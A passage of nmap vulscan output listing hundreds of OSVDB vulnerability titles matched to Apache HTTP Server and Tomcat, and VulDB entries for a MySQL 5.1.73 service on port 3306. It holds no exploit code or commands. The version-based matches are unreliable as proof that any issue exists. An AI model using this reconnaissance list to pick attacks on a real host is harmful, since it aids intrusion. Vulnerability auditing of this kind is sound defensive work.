13820| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
13821| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
13822| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
13823| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
13824| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
13825| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
13826| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
13827| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
13828| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
13829| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
13830| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
13831| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
13832| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
13833| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
13834| [40262] Apache HTTP Server mod_status refresh XSS
13835| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
13836| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
13837| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
13838| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
13839| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
13840| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
13841| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
13842| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
13843| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
13844| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
13845| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
13846| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
13847| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
13848| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
13849| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
13850| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
13851| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
13852| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
13853| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
13854| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
13855| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
13856| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
13857| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
13858| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
13859| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
13860| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
13861| [36080] Apache Tomcat JSP Examples Crafted URI XSS
13862| [36079] Apache Tomcat Manager Uploaded Filename XSS
13863| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
13864| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
13865| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
13866| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
13867| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
13868| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
13869| [34881] Apache Tomcat Malformed Accept-Language Header XSS
13870| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
13871| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
13872| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
13873| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
13874| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
13875| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
13876| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
13877| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
13878| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
13879| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
13880| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
13881| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
13882| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
13883| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
13884| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
13885| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
13886| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
13887| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
13888| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
13889| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
13890| [32724] Apache mod_python _filter_read Freed Memory Disclosure
13891| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
13892| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
13893| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
13894| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
13895| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
13896| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
13897| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
13898| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
13899| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
13900| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
13901| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
13902| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
13903| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
13904| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
13905| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
13906| [24365] Apache Struts Multiple Function Error Message XSS
13907| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
13908| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
13909| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
13910| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
13911| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
13912| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
13913| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
13914| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
13915| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
13916| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
13917| [22459] Apache Geronimo Error Page XSS
13918| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
13919| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
13920| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
13921| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
13922| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
13923| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
13924| [21021] Apache Struts Error Message XSS
13925| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
13926| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
13927| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
13928| [20439] Apache Tomcat Directory Listing Saturation DoS
13929| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
13930| [20285] Apache HTTP Server Log File Control Character Injection
13931| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
13932| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
13933| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
13934| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
13935| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
13936| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
13937| [19821] Apache Tomcat Malformed Post Request Information Disclosure
13938| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
13939| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
13940| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
13941| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
13942| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
13943| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
13944| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
13945| [18233] Apache HTTP Server htdigest user Variable Overfow
13946| [17738] Apache HTTP Server HTTP Request Smuggling
13947| [16586] Apache HTTP Server Win32 GET Overflow DoS
13948| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
13949| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
13950| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
13951| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
13952| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
13953| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
13954| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
13955| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
13956| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
13957| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
13958| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
13959| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
13960| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
13961| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
13962| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
13963| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
13964| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
13965| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
13966| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
13967| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
13968| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
13969| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
13970| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
13971| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
13972| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
13973| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
13974| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
13975| [13304] Apache Tomcat realPath.jsp Path Disclosure
13976| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
13977| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
13978| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
13979| [12848] Apache HTTP Server htdigest realm Variable Overflow
13980| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
13981| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
13982| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
13983| [12557] Apache HTTP Server prefork MPM accept Error DoS
13984| [12233] Apache Tomcat MS-DOS Device Name Request DoS
13985| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
13986| [12231] Apache Tomcat web.xml Arbitrary File Access
13987| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
13988| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
13989| [12178] Apache Jakarta Lucene results.jsp XSS
13990| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
13991| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
13992| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
13993| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
13994| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
13995| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
13996| [10471] Apache Xerces-C++ XML Parser DoS
13997| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
13998| [10068] Apache HTTP Server htpasswd Local Overflow
13999| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
14000| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
14001| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
14002| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
14003| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
14004| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
14005| [9717] Apache HTTP Server mod_cookies Cookie Overflow
14006| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
14007| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
14008| [9714] Apache Authentication Module Threaded MPM DoS
14009| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
14010| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
14011| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
14012| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
14013| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
14014| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
14015| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
14016| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
14017| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
14018| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
14019| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
14020| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
14021| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
14022| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
14023| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
14024| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
14025| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
14026| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
14027| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
14028| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
14029| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
14030| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
14031| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
14032| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
14033| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
14034| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
14035| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
14036| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
14037| [9208] Apache Tomcat .jsp Encoded Newline XSS
14038| [9204] Apache Tomcat ROOT Application XSS
14039| [9203] Apache Tomcat examples Application XSS
14040| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
14041| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
14042| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
14043| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
14044| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
14045| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
14046| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
14047| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
14048| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
14049| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
14050| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
14051| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
14052| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
14053| [7611] Apache HTTP Server mod_alias Local Overflow
14054| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
14055| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
14056| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
14057| [6882] Apache mod_python Malformed Query String Variant DoS
14058| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
14059| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
14060| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
14061| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
14062| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
14063| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
14064| [5526] Apache Tomcat Long .JSP URI Path Disclosure
14065| [5278] Apache Tomcat web.xml Restriction Bypass
14066| [5051] Apache Tomcat Null Character DoS
14067| [4973] Apache Tomcat servlet Mapping XSS
14068| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
14069| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
14070| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
14071| [4568] mod_survey For Apache ENV Tags SQL Injection
14072| [4553] Apache HTTP Server ApacheBench Overflow DoS
14073| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
14074| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
14075| [4383] Apache HTTP Server Socket Race Condition DoS
14076| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
14077| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
14078| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
14079| [4231] Apache Cocoon Error Page Server Path Disclosure
14080| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
14081| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
14082| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
14083| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
14084| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
14085| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
14086| [3322] mod_php for Apache HTTP Server Process Hijack
14087| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
14088| [2885] Apache mod_python Malformed Query String DoS
14089| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
14090| [2733] Apache HTTP Server mod_rewrite Local Overflow
14091| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
14092| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
14093| [2149] Apache::Gallery Privilege Escalation
14094| [2107] Apache HTTP Server mod_ssl Host: Header XSS
14095| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
14096| [1833] Apache HTTP Server Multiple Slash GET Request DoS
14097| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
14098| [872] Apache Tomcat Multiple Default Accounts
14099| [862] Apache HTTP Server SSI Error Page XSS
14100| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
14101| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
14102| [845] Apache Tomcat MSDOS Device XSS
14103| [844] Apache Tomcat Java Servlet Error Page XSS
14104| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
14105| [838] Apache HTTP Server Chunked Encoding Remote Overflow
14106| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
14107| [775] Apache mod_python Module Importing Privilege Function Execution
14108| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
14109| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
14110| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
14111| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
14112| [637] Apache HTTP Server UserDir Directive Username Enumeration
14113| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
14114| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
14115| [562] Apache HTTP Server mod_info /server-info Information Disclosure
14116| [561] Apache Web Servers mod_status /server-status Information Disclosure
14117| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
14118| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
14119| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
14120| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
14121| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
14122| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
14123| [376] Apache Tomcat contextAdmin Arbitrary File Access
14124| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
14125| [222] Apache HTTP Server test-cgi Arbitrary File Access
14126| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
14127| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
14128|_
141293306/tcp open mysql MySQL 5.1.73
14130| vulscan: VulDB - https://vuldb.com:
14131| [11948] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Error Handling Crash denial of service
14132| [11945] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 InnoDB memory corruption
14133| [11944] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Optimizer Crash denial of service
14134| [11941] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Privileges Crash denial of service
14135| [11939] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 Optimizer Crash denial of service
14136| [11938] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 Locking Crash denial of service
14137| [11937] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 InnoDB Crash denial of service
14138| [10819] Oracle MySQL Server up to 5.1.70/5.5.32/5.6.12 Optimizer memory corruption
14139| [100543] Oracle MySQL up to 5.1.40 Connector/J privilege escalation
14140| [100209] Oracle MySQL Connectors up to 5.1.41 Connector/J unknown vulnerability
14141| [74949] Oracle MySQL Connectors up to 5.1.34 Connector/J unknown vulnerability
14142| [10818] Oracle MySQL Server up to 5.1/5.5.22 Optimizer denial of service
14143| [9665] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Options denial of service
14144| [9663] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 Server Optimizer denial of service
14145| [9660] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 Full Text Search denial of service
14146| [9655] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 GIS Crash denial of service
14147| [8418] Oracle MySQL Server up to 5.1.67/5.5.29/5.6.10 Server Locking unknown vulnerability
14148| [8416] Oracle MySQL Server up to 5.1.63 Server Types unknown vulnerability
14149| [8410] Oracle MySQL Server up to 5.1.67/5.5.29 Server XML denial of service
14150| [8408] Oracle MySQL Server up to 5.1.67/5.5.29 Server Partition unknown vulnerability
14151| [8407] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Optimizer unknown vulnerability
14152| [8406] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 InnoDB unknown vulnerability
14153| [8405] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Information Schema unknown vulnerability
14154| [8403] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Data Manipulation Language unknown vulnerability
14155| [8400] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Privileges unknown vulnerability
14156| [8399] Oracle MySQL Server up to 5.1.66/5.5.28 Server Privileges unknown vulnerability
14157| [8398] Oracle MySQL Server up to 5.1.67/5.5.29 unknown vulnerability
14158| [8397] Oracle MySQL Server up to 5.1.67/5.5.29/5.6.10 Information Schema unknown vulnerability
14159| [8396] Oracle MySQL Server up to 5.1.67/5.5.29 Server Locking unknown vulnerability
14160| [7428] Oracle MySQL Server up to 5.1.66/5.5.28 Optimizer unknown vulnerability
14161| [7427] Oracle MySQL Server up to 5.1.66/5.5.28 unknown vulnerability
14162| [7425] Oracle MySQL Server up to 5.1.66/5.5.28 InnoDB unknown vulnerability
14163| [7423] Oracle MySQL Server up to 5.1.66/5.5.28 Locking unknown vulnerability
14164| [7422] Oracle MySQL Server up to 5.1.66/5.5.28 unknown vulnerability
14165| [7421] Oracle MySQL Server up to 5.1.66/5.1.28 Replication unknown vulnerability
14166| [7418] Oracle MySQL Server up to 5.1.66/5.5.28 Server Optimizer unknown vulnerability
14167| [7417] Oracle MySQL Server up to 5.1.66/5.5.28 Information Schema unknown vulnerability
14168| [7416] Oracle MySQL Server up to 5.1.65/5.5.27 GIS Extension denial of service
14169| [7415] Oracle MySQL Server up to 5.1.66/5.5.28 Privileges Stack-based memory corruption
14170| [6795] Oracle MySQL Server up to 5.1.64/5.5.26 Server Replication denial of service
14171| [6794] Oracle MySQL Server up to 5.1.63/5.5.25 Server Full Text Search denial of service
14172| [6791] Oracle MySQL Server up to 5.1.65/5.5.27 Server Optimizer denial of service
14173| [6790] Oracle MySQL Server up to 5.1.64/5.5.26 Server Optimizer denial of service
14174| [6788] Oracle MySQL Server up to 5.1.63/5.5.25 InnoDB Plugin denial of service
14175| [6787] Oracle MySQL Server up to 5.1.63/5.5.25 InnoDB unknown vulnerability
14176| [6785] Oracle MySQL Server up to 5.1.65/5.5.27 denial of service
14177| [6784] Oracle MySQL Server up to 5.1.64/5.5.26 Protocol unknown vulnerability
14178| [6783] Oracle MySQL Server up to 5.1.64/5.5.26 Information Schema memory corruption
14179| [5783] Oracle MySQL Server up to 5.1.62/5.5.22 Server Optimizer denial of service
14180| [5782] Oracle MySQL Server up to 5.1.62/5.5.23 Server Optimizer denial of service
14181| [5779] Oracle MySQL Server up to 5.1.62/5.5.23 GIS Extension unknown vulnerability
14182| [5159] Oracle MySQL Server up to 5.1.61/5.5.21 Optimizer denial of service
14183| [5158] Oracle MySQL Server up to 5.1.61/5.5.21 DML denial of service
14184| [5151] Oracle MySQL Server up to 5.1.60/5.5.19 MyISAM denial of service
14185| [5981] Oracle MySQL Server 5.1.62/5.5.23 Sort Order Index Calculation denial of service
14186| [5226] Oracle MySQL Server 5.1.x/5.5.x denial of service
14187| [5225] Oracle MySQL Server 5.1.x/5.5.x denial of service
14188| [5224] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14189| [5223] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14190| [5222] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14191| [5221] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14192| [5220] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14193| [5219] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14194| [5218] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14195| [5217] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14196| [56085] MySQL up to 5.1.25 init_from_wkb denial of service
14197| [56084] MySQL up to 5.1.25 Stored Procedure denial of service
14198| [56080] MySQL up to 5.1.25 Stored denial of service
14199| [56025] MySQL up to 5.1.25 Crash denial of service
14200| [56024] MySQL up to 5.1.25 store denial of service
14201| [56023] MySQL up to 5.1.25 Crash denial of service
14202| [56022] MySQL up to 5.1.25 Crash denial of service
14203| [56021] MySQL up to 5.1.25 Uninitialized Memory denial of service
14204| [56020] MySQL up to 5.1.25 Crash denial of service
14205| [56019] MySQL up to 5.1.25 Crash denial of service
14206| [56018] mysql up to 5.1.25 Configuration Parameter denial of service
14207| [54026] MySQL up to 5.1.25 Crash denial of service
14208| [53212] mysql 5.1.45 mysql_uninstall_plugin unknown vulnerability
14209| [3469] Sun MySQL 5.1.23 Bk InnoDB denial of service
14210| [41090] MySQL Mysql Community Server up to 5.1.4 unknown vulnerability
14211| [36814] MySQL up to 5.1.17 information disclosure
14212| [36813] mysql up to 5.1.17 thd::db_access denial of service
14213| [36812] MySQL up to 5.1.17 unknown vulnerability
14214|
14215| MITRE CVE - https://cve.mitre.org:
